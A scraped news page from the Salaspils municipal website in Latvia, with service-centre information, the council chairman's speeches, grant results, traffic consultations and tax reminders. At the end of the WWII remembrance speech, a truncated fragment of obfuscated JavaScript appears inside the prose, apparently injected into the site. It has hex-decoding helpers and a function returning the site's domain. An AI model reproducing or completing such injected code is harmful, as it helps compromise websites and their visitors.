Šī mājaslapa izmanto dažādas sīkdatnes. Dažas sīkdatnes ir funkcionāli nepieciešamas, bez kurām Jūs nevarēsiet lietot šo mājaslapu. Bet pārējās sīkdatnes tiks izmantotas tikai tad, ja Jūs tam piekrītat. Uzzināt vairāk

Salaspils novada Valsts un pašvaldības vienotais klientu apkalpošanas centrs

Centrā var saņemt šādu valsts iestāžu pakalpojumus, informāciju vai konsultācijas par tiem: VALSTS IEŅĒMUMU DIENESTS Pieņem iesniegumus šādu pakalpojumu saņemšanai: elektroniskās algas nodokļa grāmatiņas iesniegšana/izņemšana; iedzīvotāju ienākuma nodokļa atvieglojumu reģistrēšana vai anulēšana; lietotājvārda un paroles saņemšana elektroniskās deklarēšanas sistēmas (EDS) lietošanai; gada ienākumu deklarācijas iesniegšana (bez konsultācijas par deklarācijas aizpildīšanu). Sniedz atbalstu darbā ar EDS un VID e-pakalpojumu izmantošanā.   VALSTS SOCIĀLĀS APDROŠINĀŠANAS AĢENTŪRA Pieņem iesniegumus šādu pakalpojumu saņemšanai: apbedīšanas pabalsts; bezdarbnieka pabalsts; bērna invalīda kopšanas pabalsts; bērna kopšanas pabalsts; bērna piedzimšanas pabalsts; ģimenes valsts pabalsts; invaliditātes pensija; maternitātes pabalsts; pabalsts invalīdam, kuram nepieciešama kopšana; pabalsts transporta izdevumu kompensēšanai invalīdam, kuram ir apgrūtināta pārvietošanās; paternitātes pabalsts; slimības pabalsts; valsts sociālā nodrošinājuma pabalsts; vecāku pabalsts; vienreizējs pabalsts mirušā laulātajam (pensionāram). Uzrakstot iesniegumu, iedzīvotāji var saņemt izziņu: par sociālās apdrošināšanas iemaksām un apdrošināšanas periodiem; par reģistrēto darba stāžu (līdz 1996. gadam); par piešķirtās pensijas, pabalsta un atlīdzības apmēru; par izmaksai nosūtīto pensiju, pabalstu un atlīdzību; par VSAA ieturēto ienākuma nodokli; par prognozējamo vecuma pensijas apmēru; par izmaksātajiem pabalstiem, pensijām, atlīdzībām un ieturēto ienākumu nodokli (ienākumu deklarēšanai); par apdrošinātās personas pensijas kapitālu; par valsts fondēto pensiju shēmas dalībnieka reģistrāciju un ieguldījuma plāna izvēli; par ieturējumiem no izmaksājamās pensijas/pabalsta/atlīdzības; par valsts fondēto pensiju shēmas (pensiju 2.līmeņa) līdzekļu pārvaldītāja un ieguldījuma plāna maiņu un citiem pakalpojumiem. Ievērībai! Ārstniecības čeki, kas saistīti ar arodslimību un nelaimes gadījumu darbā, kā arī iesniegums valsts atbalsta ar celiakiju slimiem bērniem piešķiršanu netiek pieņemts. Čekus un minēto iesniegumu jānosūta pa pastu VSAA vai personīgi jānogādā tuvākajā VSAA nodaļā.   NODARBINĀTĪBAS VALSTS AĢENTŪRA Sniedz konsultācijas par e-pakalpojumiem: iesniegums bezdarbnieka vai darba meklētāja statusa piešķiršanai; (CV un vakanču portāls, karjeras pakalpojumi, informatīvās dienas e-versija, elektroniskās bezdarbnieku klasifikācijas un profilēšanas metode, apmācību monitorings, darba tirgus prognozes).   UZŅĒMUMU REĢISTRS Sniedz konsultācijas par e-pakalpojumiem: „Reģistrācija Uzņēmumu reģistra vestajos reģistros”; „Izziņu pieprasīšana no Uzņēmumu reģistra vestajiem reģistriem”.   PILSONĪBAS UN MIGRĀCIJAS LIETU PĀRVALDE Sniedz konsultācijas par e-pakalpojumiem.   VALSTS ZEMES DIENESTS Sniedz konsultācijas par e-pakalpojumiem   VALSTS DARBA INSPEKCIJA Sniedz konsultācijas par e-pakalpojumiem   UZMANĪBU - SVARĪGI: Lai saņemtu pakalpojumu VPVKAC, jāuzrāda personu apliecinošs dokuments. Lai saņemtu e-pakalpojumu, personai nepieciešams autentificēties ar savu internetbanku, ar eID karti vai elektroniskā paraksta viedkarti.

lasīt vairāk
Domes priekšsēdētāja uzruna Otrā pasaules kara upuru piemiņas dienā

Kaut arī Otrais pasaules karš ir beidzies jau pirms 71 gada, bet Latvija atguva tā laikā zaudēto neatkarību pirms 25 gadiem, tikai tagad vēsturniekiem ir bijusi iespēja radīt objektīvu stāstu par tā laika notikumiem Salaspilī – šajā vietā, kur atradās vācu nacistu ierīkota nometne. Nometne, kurā bija ieslodzīti gan latviešu patrioti, gan padomju režīma aktīvisti, latviešu un igauņu vācu armijā iesauktie kareivji, lietuviešu militārpersonas, Latgales un Baltkrievijas ciemu iedzīvotāji – pieaugušie un bērni. Nometnē tās pastāvēšanas laikā bija ieslodzīti vairāk nekā 20 000 personu, daudzi šajā ciešanu vietā zaudēja dzīvības. Mūsu pienākums ir izstāstīt šo stāstu godīgi un atklāti iespējami lielākam cilvēku skaitam. Karam beidzoties, Latvijā vienu noziedzīgu režīmu nomainīja otrs, kuram bija vienaldzīgas gan cilvēku ciešanas, gan vēsturiskā patiesība, to interesēja absurdu ideoloģisku mērķu sasniegšana par jebkādu cenu un ar jebkādiem līdzekļiem, tai skaitā gan falsificējot vēsturiskos faktus, gan arī melojot. Cilvēcīga upuru piemiņa pieprasa propagandas melus aizstāt ar patiesību. Tikai patiesība neaptumšo upuru piemiņu un padara to pieņemamu ikvienam, padara iespējamu kopīgu piemiņu! Esmu gandarīts par mūsu Latvijas vēsturnieku pirmo akadēmiski vispusīgo pētījumu par Salaspils nometni. Lasīsim to un izglītosimies! To dienu skaudros notikumus mums atklāj akadēmisks vēsturisko faktu izklāsts un uzskaitījums, tomēr tie vienmēr ir fakti par ļauniem, necilvēciskiem nodarījumiem kādai ģimenei, kādam pieaugušajam, kādam bērnu. Aiz cieņas pret šiem cilvēkiem neizdomāsim neko, būsim godīgi un atklāti, bet galvenais - vienosimies kopīgā piemiņā! Esmu gandarīts, ka jau otro gadu Salaspils memoriālā 8. maijā notiek nacisma sagrāves un Otrā pasaules kara upuru piemiņas dienas pasākums ar Latvijas Ministru prezidenta un ārvalstu diplomātiskā korpusa pārstāvju piedalīšanos. Šie piemiņas pasākumi ir atgriezuši Salaspili Latvijas Otrā pasaules kara vēstures izvērtējuma apritē. Es ļoti ceru, ka ar laiku tieši Salaspils būs tā piemiņas vieta, kurā 8. maijā par kopīgu vēstures izpratni un kara upuru piemiņu, atsakoties no padomju režīma falsificējumiem un izdomājumiem, varēs vienoties visu tautību Latvijas iedzīvotāji. Šim mērķim kalpos arī jaunā memoriāla ekspozīcija, ko esam paredzējuši atklāt līdz Latvijas Republikas simtgadei, ko svinēsim 2018. gadā. Mūsu visu svēts pienākums ir gan atcerēties, gan nepieļaut kara šausmu atkārtošanos. Mūsu lielais novadnieks Knuts Skujenieks, cilvēks, kas pārcietis ieslodzījumu GULAGA padomju nometnē, mūsu novadam veltījis rindas: Ik zemes pēda te ir rētām klāta, Un dvēseles caur zāļu saknēm sauc To maksu neaizmirst, kas samaksāta, Lai mums zem saules mierā dzīvot ļauts. Mierā dzīvot ļauts… Mūžīga piemiņa kara upuriem! // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "salaspils.lv"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

lasīt vairāk
Domes priekšsēdētāja sveiciens Latvijas neatkarības atjaunošanas gadadienā

Dārgie novadnieki! Sveicu Jūs Latvijas Republikas neatkarības atjaunošanas gadadienā! No 1990. gada 4. maija iesākās mūsu valsts otrā elpa. Paldies Dievam, ka deviņdesmitajos gados bija vēl tā paaudze, kura pieredzēja pirmskara Latviju! Lai arī okupācijas gados daudz kas tika iznīcināts, mēģināts dzēst no cilvēku prātiem, tomēr arī pašos grūtākajos brīžos palika atmiņa – gan lepnumā par neatkarības laikā sasniegto, gan spītā pret svešu ideoloģiju. Protams, pāri nodarījuma sajūtu nedrīkst likt mūsu valsts pamatos. Tomēr to nevar būvēt arī uz vēstures nezināšanas un pastāvošo draudu neapzināšanās akmeņiem. Mūsu pensionāri nedzīvo Dānijas labklājības līmenī, protams, tāpēc, ka neesam pa šiem 25 gadiem izdarījuši visu iespējamo, lai tā būtu. Bet mēs, pirmkārt, nedzīvojam Dānijas vai Somijas (valstis, kurām bija līdzīgs ar Latviju attīstības līmenis trīsdesmitajos gados) labklājības līmenī arī tādēļ, ka Latvijas valsts attīstība četrdesmitajos gados tika pārrauta varmācīgā veidā, un šim noziegumam ir konkrēti veicēji totalitāro režīmu un to līdzskrējēju izskatā. Mūsu atpalicības no Rietumeiropas iedzīšanā dažreiz nolaižas rokas! Dažreiz gribas sevi pažēlot! Draugi, tam nav nekāda pamata! Mēs dzīvojam valstī, kuru daudzi apbrīno gan par tās dabas skaistumu, gan mūsu pilsētu būvēm, gan arī par to, ka esam spējuši uzcelties no aizmirstības pīšļiem 1990. gada 4. maijā! Mēs ceļam savu valsti, mēs ceļam mūsu Salaspils novadu, un neviens mums nevar traucēt, vienīgi mēs paši. Priecīgus svētkus Jums un Jūsu ģimenēm! Jūsu Raimonds Čudars

lasīt vairāk
Dienas centram- 5

16. maijā Nacionālā Botāniskā dārza oranžērijā savu piecu gadu pastāvēšanas jubileju atzīmēja Dienas centrs personām ar funkcionāliem traucējumiem. Pasākums pulcēja kopā gan sveicējus, gan aktīvākos centra klientus. Ievadā teicām pateicības vārdus visiem, kas palīdzējuši veidoties, augt, attīstīties un būt par vietu, kuru daudzi uzskata par otrajām mājām. Savā uzrunā vēlējos salīdzināt Dienas centru ar kādu augu. Kopā ar viesiem izvēlējāmies liepu un asociējām Dienas centru ar liepu, kuras augšanai “Zelta atslēdziņa” jau bija sākusi līst līdumus un gadus vēlāk- pašvaldība iesējusi liepas sēklu. Sākotnēji liepu laistīja Eiropas Sociālie fondi, bet ar laiku rūpes par liepu uzņēmās Salaspils novada pašvaldība. Īpaši priekšsēdētāja vietniece Malda Caune, kura rūpējās, lai liepas zari augtu kupli un spēcīgi. Pateicība tika izteikta visiem, kas atbalstījuši Dienas centra tapšanu un pastāvēšanu, īpaši novērtējot labo sadarbību ar Sociālā dienesta vadītāju Guntu Gumbinu, kura gādājusi, lai augsne liepai būtu gana auglīga un bagāta. Pateicības vārdus un dzejas rindas teica arī drosmīgākie klienti, uzsverot visu darbinieku individuālo ieguldījumu. Viņi pateicās Oskaram Grumoldam, Natālijai Seļivanovai, Kristiānai Nazārovai, Ludmilai Abrickai un Rasai Riekstai-Riekstiņai, kā arī pašvaldībai par atbalstu gadu garumā, īpaši izceļot Maldu Cauni un Raimondu Čudaru. Vēlāk savā uzrunā priekšsēdētājs R. Čudars novēlēja, lai tomēr tas stiprais koks, ar ko asociē Dienas centru, ir kārtīgs, resns, kupls ozols, kādi auga senlatviešu sētās. Lai tas ir ar resnu stumbru, kārtīgām saknēm, kuplu vainagu un pastāv mūžību. Savā runas otrajā pusē vēlējos citēt Imantu Ziedoni: “Visi mēs esam pudeles un kārbiņas, burkas un afišu stabi. Visus mūs aplīmēja, aplīmē un aplīmēs – sabiedriska paradumība. Jo etiķete ir cilvēku pazīšanās zīme: tev ir plats gabardīna mētelis – tu esi savējais; tev ir tetovējumi uz rokām un krūtīm – tu esi mūsējais; tev ir ģitāra un pinkaini mati – tu esi mūsu puika. Tu esi džentlmenis, tu esi nelga, tu esi snobs, un tu esi pilsonis. Citus pazīst pēc importa apģērba gabaliem, pasaules modes saules brillēm, cepurēm, kamzoliem un bikšturiem. Citiem ir nekur nedabūjamas dārgas zvērādu cepures.” Vēlējos teikt, ka Dienas centrs ir tā vieta, kur nav šo birku un etiķešu, te katrs cilvēks ir vērtība pats par sevi, un mēs visi mācāmies viens no otra- mācāmies iecietību, izturību, pieņemt dažādus viedokļus. Ir reizes, kad Dienas centrā mēdzam arī strīdēties, dusmoties, bet tāpat cienām viens otru un gaidām, kad satiksimies centra telpās ik dienu. Sveikt Dienas centru bija ieradušies tuvākie draugi- no pašvaldības Raimonds Čudars un Malda Caune, kura bija aizkustināta par sirsnīgo atmosfēru un izteica pateicības vārdus darbiniekiem par smago darbu un nerimstošo entuziasmu, klientu tuvinieki, sporta treneri, Sociālā dienesta kolektīvs ar vadītāju Guntu Gumbinu, kas Dienas centra dalībniekiem pasniedza pateicības rakstus, “Zelta atslēdziņa”, “Kolotilovka”, Ludmila Belinceva (Ukraiņu apvienības Latvijā priekšsēdētāja), Sociālā centra vadītāja Daiga Možeika. Sveicienus gardas tortes veidolā saņēmām arī no “Saulkalne S”, par ko Dienas centrs izsaka pateicību. Par muzikālo baudījumu parūpējās mākslinieki Ilmārs Šterns un Lauma Kazaka (paldies par to Janai Kolbinai). Paldies visiem klientiem un viņu ģimenēm, draugiem, kolēģiem, brīvprātīgajiem, sadarbības partneriem, kas bijuši ar mums kopā šos 5gadus! Izsaku personīgu pateicību NBD (īpaši Lāsmai Semerovai un Katrīnei Tučai) par sirsnīgo uzņemšanu un šo iespēju svinēt svētkus tik skaistā vietā.

lasīt vairāk
Aicinām izteikt viedokli par satiksmes ierobežojumiem Raiņa ielas rajonā

Marta beigās Rīgas ielā uzsākās rekonstrukcijas darbi, kuru ietvaros uzlabosies gan gājēju, gan autobraucēju drošība. Neizbēgami šādi apjomīgi darbi rada neērtības un satiksmes ierobežojumus. Sākoties būvdarbiem Rīgas ielā, kā oficiālais apbraucamais ceļš tika noteikts Budeskalnu un Meža ielas. Jau uzreiz pašvaldība konstatēja, ka liela daļa autobraucēju to neievēro un izvēlas ceļu mērot pa Raiņa ielu. Lai to ierobežotu, tika uzstādīti divi ātrumvaļņi jeb gulošie policisti un ceļa zīme ”Dzīvojamā zona”, kas autobraucējiem liek samazināt ātrumu līdz 20km/h, bet smagajam transportam pārvietošanās ir liegta, ja vien teritorijā neatrodas kāds piegādes punkts. Aprīlī pašvaldība saņēma Raiņa ielas iedzīvotāju sūdzību ar lūgumu satiksmi šeit slēgt pavisam (uzlikt ceļa zīmi Nr.302 “braukt aizliegts”), pamatojot ar to, ka satiksmes intensitāte šeit nav mazinājusies un autovadītāji ignorē zīmi “Dzīvojamā zona”. Iedzīvotajiem bažījās, ka kāda pārgalvīga autobraucēja dēļ var ciest kājāmgājēji. Protams, var uz remontdarbu laiku izvietot ceļa zīmi “caurbraukt aizliegts”, taču arī šis variants nav ideāls. Pirmkārt, nav iespējams slēgt tikai Raiņa ielu, satiksmes ierobežojumi skars arī mazās šķērsielas, otrkārt, zonā varēs atrasties tikai tie auto, kuru īpašnieki šeit ir deklarējuši savu dzīvesvietu. Tas nozīmē, ka pat ģimenes ārsts ar savu auto vai jūsu ciemiņi šeit braukt nedrīkstēs. To pastiprināti kontrolēs Valsts policija. Turklāt, kā mēs visi zinām, zīmes izvietošana negarantē, ka zīmes darbība konkrētajā situācijā tiks ievērota. Pašvaldība konsultējās arī ar VAS “Latvijas Valsts ceļi”, kuri atbild par zīmju izvietošanu. LVC neiesaka ielu slēgt, jo tas var radīt vēl vairāk problēmu iedzīvotājiem. Šobrīd pašvaldība piedāvā pagaidu risinājumu- uzstādīt vēl divus ātrumvaļņus. Tāpat ir uzrakstītā vēstule Valsts policijai ar lūgumu veikt pastiprinātu kontroli, sekojot, vai autobraucēji pārvietojas atbilstoši ceļu satiksmes noteikumiem. Pašvaldība lūdz arī pārējos Raiņa ielas iedzīvotājus izteikt savas idejas par autotransporta satiksmes ierobežojumiem, jo pašvaldībai ir zināms vien daļas iedzīvotāju viedoklis. Tādēļ gaidām jūsu ieteikumus uz epastu

lasīt vairāk
Noslēdzies bērnu un jauniešu vasaras nometņu projektu konkurss

Konkursa mērķis ir finansiāli atbalstīt projektus, kas veicina Salaspils novada bērnu un jauniešu brīvā laika organizēšanu vasaras periodā, un atbalstīt jauniešu brīvprātīgo darbu, iesaistot nometnes projekta realizācijā. Konkursā pavisam tika iesniegti 18 pieteikumi no dažādām pašvaldības iestādēm un biedrībām. Iesniegtie pieteikumi tika rūpīgi izvērtēti atbilstoši nolikumam, un no 18 pieteikumiem līdzfinansējumu saņēma 15 par kopējo summu 22560,00 eiro. Finanšu līdzekļus piešķīra šādiem bērnu un jauniešu nometņu projektiem: Biedrības „Bērnu futbola klubs „Salaspils”” diennakts nometne “BFK Salaspils”; Biedrības „Salaspils karatē klubs” diennakts nometne “Drosmīgais karatists; Salaspils 1.vidusskolas dienas nometne „Dzīvespriecīgā pasaule”; Salaspils 1.vidusskolas dienas nometne „Krāsainā pasaule”; Salaspils 2. vidusskolas diennakts nometne „Draugi – 1”; Salaspils 1. vidusskolas diennakts nometne „Draugi – 2”; Salaspils 1.vidusskolas dienas nometnei “Atklāj zinātkāri”; Biedrības „Salaspils Džosui Karatē klubs” diennakts nometne „KARATEKA”; Biedrības “Saulkalnes Sports” vindsērfinga dienas nometne “KAMBĪZE”; FIRST LEGO League Latvia diennakts nometne “Robotizātora ekspedīcija” ; Salaspils daudzbērnu ģimeņu biedrības “Mārtiņsala” diennakts nometne “SAVĒJIE – LIELIE”; Salaspils Daudzbērnu ģimeņu biedrības “Mārtiņsala” diennakts nometne “SAVĒJIE – MAZIE” ; Biedrības „Salaspils frisbija klubs” dienas nometne “Salaspils frisbija nometne 2016” ; Biedrības „Igora Miglinieka sporta skola” diennakts nometne “Igora Miglinieka sporta skolas nakts nometne Madlienā”; Salaspils sporta nama dienas nometne “TU VARI” . Finanšu līdzekļu piešķiršana tika atteikta šādiem projektiem: Sporta kluba “Kengaroos” diennakts nometne “Albatross”; Biedrības “Igora Miglinieka sporta skola” dienas nometne “IM Sports”; Bērnu attīstības centra dienas nometne “Atdzīvināsim iztēli”. Nometņu pieteikumu konkurss Salaspilī notiek jau vairāk kā 10 gadus. Katru gadu pirms konkursa izsludināšanas tiek organizēta informācijas diena, kur nometņu vadītāji var precizēt neskaidros jautājumus. Nometņu pieteikumi parasti tiek izstrādāti ļoti rūpīgi, tādēļ konkurence ir liela. Salaspils novada pašvaldības līdzfinansējumu bērns var izmantot vienu reizi. Ja piedalās vairākās nometnēs, tad vecākiem jāsedz pilna nometnes maksa. Biedrības “Saulkalnes sports” vindsērfinga nometnei 8 līdz 16 gadus veciem bērniem, kura notiks no 6. līdz 10. jūnijam, var pieteikties pa tālr. 29490402 vai e-pastu \n Šī e-pasta adrese ir aizsargāta no mēstuļu robotiem. Pārlūkprogrammai ir jābūt ieslēgtam JavaScript atbalstam, lai varētu to apskatīt. . Salaspils sporta nama nometnei “Tu vari”, kas notiks no 18. līdz 22.jūlijam, varēs pieteikties ww.salaspilssporto.lv no 30.jūnija. Dalībnieku skaits ierobežots. Ja ir vēlme piedalīties nometnēs “Draugi -1” un “Draugi-2”, varat pieteikties pie Anitas Voras pa tālruni 26412186. “Draugi-1” notiks no 11. līdz 17. jūlijam, savukārt “Draugi-2”- no 1. līdz 7. augustam. Abas paredzētas 9 līdz 15 gadus veciem bērniem. Salaspils 1.vidusskola no 13.-18. jūnijam rīko dienas nometni “Atklāj zinātkāri”  skolēniem vecumā no 9 līdz 13 gadiem.  Pieteikties līdz 24.maijam, sūtot pieteikumu uz 

lasīt vairāk
Nekustamā īpašuma nodokļa maksātāju ievērībai!

Atgādinām, ka līdz 2016.gada 16.maijam veicams kārtējais nekustamā īpašuma nodokļa maksājums. Saskaņā ar likumu „Par nekustamā īpašuma nodokli”, nekustamā īpašuma nodokļa maksājumi veicami vienu reizi ceturksnī ne vēlāk kā 31. martā, 15. maijā, 15. augustā un 15. novembrī - vienas ceturtdaļas apmērā no nodokļa gada summas vai arī reizi gadā - avansa veidā (ja termiņš ir brīvdiena, tas tiek pārcelts uz tuvāko darba dienu). Nomaksāt NĪN iespējams pašvaldības norēķinu punktos, bankā, internetbankā, portālā www.epakalpojumi.lv un www.latvija.lv. Veicot maksājumu internetbankā, būtiski ir pārliecināties, vai pārskaitījums adresēts pašvaldībai, kas izsūtījusi paziņojumu par NĪN nomaksu. Pārskaitījums veicams uz kādu no tiem pašvaldības kontiem, kas norādīti sagatavotajā maksāšanas paziņojumā. Droši un ērti NĪN ir nomaksāt portālā www.epakalpojumi.lv vai www.latvija.lv. Abos portālos pieejami pašvaldību banku konti NĪN samaksai, kā arī nodokļa maksātājam automātiski uzrādās visa nepieciešamā informācija maksājuma veikšanai. Portālā www.epakalpojumi.lv iespējams veikt nomaksu arī par citas fiziskas vai juridiskas personas īpašumiem. Aicinām nodokli samaksāt laicīgi, jo saskaņā ar likumu par laikā neveiktu maksājumu tiek aprēķināta nokavējuma nauda 0,05% apmērā no nesamaksātās summas. Lai nerastos pārpratumi saistībā ar nodokļa apmaksas termiņu, portālā www.epakalpojumi.lv iespējams pieteikties atgādinājumu saņemšanai e-pastā vai īsziņas veidā uz mobilo tālruni (SMS) par NĪN apmaksas termiņa tuvošanos. Atgādinājuma vēstule uz norādīto e-pastu tiks izsūtīta septiņas dienas pirms maksāšanas termiņa, bet SMS veidā – maksāšanas termiņa samaksas dienā. Aicinām nodokļu maksātājus izmantot iespēju saņemt maksāšanas paziņojumu uz e-pasta adresi. Pieteikties elektroniskajam maksāšanas paziņojumam iespējams portālā www.epakalpojumi.lv vai lejupielādējot iesnieguma veidlapu no pašvaldības mājas lapas un aizpildītu iesniegumu adresējot pašvaldībai. Atgādinām, ka saskaņā ar likumu nodokļa maksātāju pienākums ir pašiem savlaicīgi interesēties par NĪN nodokļa apmēru un to, vai nodoklis ir nomaksāts pilnā apmērā. Statistikas dati

lasīt vairāk
Noslēdzies projektu konkurss ”Mūžizglītības kursu organizēšana un īstenošana Salaspils novada iedzīvotājiem”

Konkursa mērķis ir finansiāli atbalstīt projektus, kas pieaugušajiem Salaspils iedzīvotājiem nodrošina iespēju saņemt izglītības pakalpojumus ārpus formālās izglītības, lai veicinātu jaunu prasmju apguvi un zināšanu pilnveidi. Konkursā pavisam tika iesniegti seši pieteikumi no dažādām pašvaldības iestādēm un biedrībām, un visi tika apstiprināti. Iesniegtos pieteikumus izvērtēja komisija, kura atbilstoši konkursa kritērijiem nolēma piešķirt pašvaldības līdzfinansējumu projektiem par kopējo summu 2553,73 eiro apmērā. Tie ir: „Topošo māmiņu un jauno vecāku skola” (450 eiro); „Lietišķā angļu valoda 2” (311,45 eiro); “Mākslas valoda–atbalsts un sadarbība cilvēkiem ar īpašām vajadzībām” (450 eiro); “Zaļo infrastruktūru izvērtējums un apsaimniekošanas piemēri publiskajā telpā (445,28 eiro); “Dāmu sala” (450 eiro); “Veselīga dzīvesveida un uztura veicināšana saulkalniešiem” (450 eiro). Konkursa prioritārās jomas 2016.gadā bija valodas apguve, paaudžu saskarsmes prasmju pilnveide, personības attīstības pilnveide un tehnoloģisko inovāciju apguve. Jaunatnes lietu un mūžizglītības speciāliste Liene Celmiņa

lasīt vairāk
Piedalies Līvzemes ielas apkārtnes satiksmes mezglu projektēšanas sabiedriskajā apspriešanā!

Pamatojoties uz Salaspils novada pašvaldības pasūtījumu, SIA “E.Daniševska birojs” ir izstrādājis priekšlikumus satiksmes organizācijas izmaiņām Lauku–Rīgas–Līvzemes–Gaismas–Zvaigžņu ielu rajonam, kuru ietvaros ir plānots uzlabot Salaspils novada un pilsētas administratīvā centra pieejamību un vizuālo kvalitāti, sakārtojot transporta, velo un gājēju infrastruktūru atbilstoši laikmeta prasībām. Ņemot vērā, ka plānotie uzlabojumi skar vismaz četras svarīgas darbu aktivitātes (stāvvietu paplašināšana, krustojuma risinājumu uzlabošana Līvzemes-Gaismas-Rīgas ielas krustojumā, dzīvojamās zonas ieviešana, gājēju celiņa izveide no Līvzemes ielas līdz Zvaigžņu-Rīgas ielas krustojumam) tuvāko gadu laikā un nozīmību Salaspils iedzīvotāju pierastās pārvietošanās un publiskās telpas izmantošanas izmaiņām ir nepieciešama iedzīvotāju iesaiste. Tādēļ 27. aprīļa domes sēdē deputāti nolēma nodot sabiedriskajai apspriešanai SIA “E.Daniševska birojs” izstrādātos priekšlikumus satiksmes organizācijas izmaiņām Salaspilī. Sabiedriskās apspriedes termiņš ir no 2016.gada 6. maija līdz 5.jūnijam. Apspriede notiks 2. jūnijā plkst.17.00 Salaspils novada pašvaldības ēkas aktu zālē. Var jau tagad elektroniski aizpildīt aptaujas anketu. Priekšlikumi satiksmes organizācijas izmaiņām 1. variants Izmaiņas piegulošās ielās un stāvvietās 2. variants

lasīt vairāk

Salaspils

°C
Gaisa spiediens: hPa
Vēja stiprums: m/s
Vēja virziens:
tukšītis

Arhīvs